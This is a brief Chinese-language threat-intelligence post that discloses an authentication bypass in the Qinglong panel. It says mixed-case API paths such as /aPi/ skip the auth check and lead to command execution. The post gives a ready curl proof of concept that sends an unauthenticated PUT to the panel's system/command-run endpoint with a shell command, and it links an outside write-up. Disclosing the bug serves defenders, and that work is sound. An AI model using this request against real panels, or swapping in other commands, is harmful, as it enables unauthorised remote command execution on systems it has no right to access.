青龙面板最新版存在一处鉴权绕过漏洞,未认证请求可访问高权限接口,并最终触发命令执行。
攻击者可通过大小写变形路径(如
/API/...)绕过鉴权 curl -X PUT "http://localhost:5700/aPi/system/command-run" \ -H "Content-Type: application/json" \
-d '{"command": "id"}'
原文:https://mp.weixin.qq.com/s/mbjS5himBugBI_KX8pC68g
#威胁情报 #poc
